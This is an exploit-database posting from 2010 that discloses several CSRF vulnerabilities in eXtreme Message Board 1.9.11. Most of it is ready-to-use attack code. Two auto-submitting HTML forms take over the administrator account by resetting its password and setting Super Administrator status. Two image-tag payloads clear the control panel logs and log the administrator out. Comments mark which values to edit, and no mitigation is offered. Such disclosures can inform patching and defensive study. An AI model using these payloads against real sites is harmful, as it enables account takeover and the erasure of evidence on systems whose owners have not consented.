eXtreme Message Board 1.9.11 Multiple CSRF Vulnerabilities
Posted on 15 July 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>eXtreme Message Board 1.9.11 Multiple CSRF Vulnerabilities</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>========================================================== eXtreme Message Board 1.9.11 Multiple CSRF Vulnerabilities ========================================================== The vulnerable application can be downloaded from: http://www.xmbforum.com/download/XMB-1.9.11.09.zip <!--- Title: eXtreme Message Board 1.9.11 Multiple CSRF Vulnerabilities Author: 10n1z3d <10n1z3d[at]w[dot]cn> Date: Thu 15 Jul 2010 12:08:07 PM EEST Vendor: http://www.xmbforum.com/ Download: http://www.xmbforum.com/download/XMB-1.9.11.09.zip ---> -=[ CSRF PoC 1 - Change Admin Password ]=- -=[ Method 1 - editprofile.php ]=- <html> <head> <title>eXtreme Message Board 1.9.11 Multiple CSRF Vulnerabilities - Change Admin Password</title> </head> <body onload="document.csrf.submit();"> <form name="csrf" action="http://[domain]/[path]/editprofile.php?user=admin" method="post"> <!--- Edit these ---> <input type="hidden" name="username" value="admin" /> <input type="hidden" name="newemail" value="root@root.com" /> <input type="hidden" name="newpassword" value="rootroot" /> <!--- Do not edit below ---> <input type="hidden" name="status" value="Super Administrator" /> <input type="hidden" name="editsubmit" value="Edit Profile" /> </form> </body> </html> -=[ Method 2 - cp.php ]=- <html> <head> <title>eXtreme Message Board 1.9.11 Multiple CSRF Vulnerabilities - Change Admin Password</title> </head> <body onload="document.csrf.submit();"> <form name="csrf" action="http://[domain]/[path]/cp.php?action=members" method="post"> <!--- Edit this ---> <input type="hidden" name="pw1" value="rootroot" /> <!--- Fun ---> <input type="hidden" name="postnum1" value="1337" /> <input type="hidden" name="cusstatus1" value="rooted" /> <!--- Do not edit below ---> <input type="hidden" name="srchmem" value="admin" /> <input type="hidden" name="status1" value="Super Administrator" /> <input type="hidden" name="membersubmit" value="Submit Changes" /> </form> </body> </html> -=[ CSRF PoC 2 - Clear Control Panel Logs ]=- <img src="http:/[domain]/[path]/tools.php?action=logsdump&yessubmit=Yes" alt="Do you see this?" /> -=[ CSRF PoC 3 - Logout The Administrator ]=- <img src="http://[domain]/[path]/misc.php?action=logout" alt="Do you see this?" /> <!--- http://www.evilzone.org/ irc.evilzone.org (6697 / 9999) ---> # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-15]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>